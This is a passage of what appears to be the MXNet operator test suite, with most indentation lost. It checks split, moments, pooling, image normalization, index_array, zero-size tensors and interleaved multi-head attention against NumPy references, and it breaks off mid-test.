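    assert np.isclose(loss, -np.log(probs[0, 2]))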
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
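# Small sketch (assumption: illustrative helper, not used by the test) of what
# moments returns: the mean and the biased variance over the reduced axes.
def _moments_example():
    import numpy as np
    x = np.arange(6.0).reshape(2, 3)
    mean, var = np.mean(x, axis=1), np.var(x, axis=1)
    assert np.allclose(var, np.mean((x - mean[:, None]) ** 2, axis=1))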
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[0, :, :] = data_expected_3d[0, :, :] / 3.0
data_expected_3d[1, :, :] = (data_expected_3d[1, :, :] - 1.0) / 2.0
data_expected_3d[2, :, :] = data_expected_3d[2, :, :] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[0, :, :] = 1 / 3.0
grad_expected_3d[1, :, :] = 1 / 2.0
grad_expected_3d[2, :, :] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0, 0, :, :] = data_expected_4d[0, 0, :, :] / 3.0
data_expected_4d[0, 1, :, :] = (data_expected_4d[0, 1, :, :] - 1.0) / 2.0
data_expected_4d[0, 2, :, :] = data_expected_4d[0, 2, :, :] - 2.0
data_expected_4d[1, 0, :, :] = data_expected_4d[1, 0, :, :] / 3.0
data_expected_4d[1, 1, :, :] = (data_expected_4d[1, 1, :, :] - 1.0) / 2.0
data_expected_4d[1, 2, :, :] = data_expected_4d[1, 2, :, :] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0, 0, :, :] = 1 / 3.0
grad_expected_4d[0, 1, :, :] = 1 / 2.0
grad_expected_4d[0, 2, :, :] = 1 / 1.0
grad_expected_4d[1, 0, :, :] = 1 / 3.0
grad_expected_4d[1, 1, :, :] = 1 / 2.0
grad_expected_4d[1, 2, :, :] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:] = (data_expected_3d - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:] = (data_expected_4d - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
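# Minimal NumPy sketch of the per-channel semantics tested above (CHW layout):
# out[c] = (in[c] - mean[c]) / std[c], hence the constant gradient 1 / std[c].
def _normalize_example():
    import numpy as np
    img = np.random.uniform(0, 1, (3, 4, 4))
    mean = np.array([0.0, 1.0, 2.0])[:, None, None]
    std = np.array([3.0, 2.0, 1.0])[:, None, None]
    out = (img - mean) / std
    assert np.allclose(out[1], (img[1] - 1.0) / 2.0)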
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
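# Hedged sketch of the reference used above: contrib.index_array maps every
# element to its own coordinate vector, i.e. np.stack(np.mgrid[...], axis=-1).
def _index_array_example():
    import numpy as np
    shape = (2, 3)
    idx = np.stack(np.mgrid[tuple(slice(0, s) for s in shape)], axis=-1)
    assert idx.shape == (2, 3, 2)
    assert tuple(idx[1, 2]) == (1, 2)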
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
high = 1
assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
check_random_exp()
check_random_gamma()
check_random_normal()
check_random_poisson()
check_random_randint()
check_random_uniform()
check_nd_array()
check_nd_ones()
check_nd_zeros()
check_nd_full()
check_nd_arange()
check_nd_random()
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
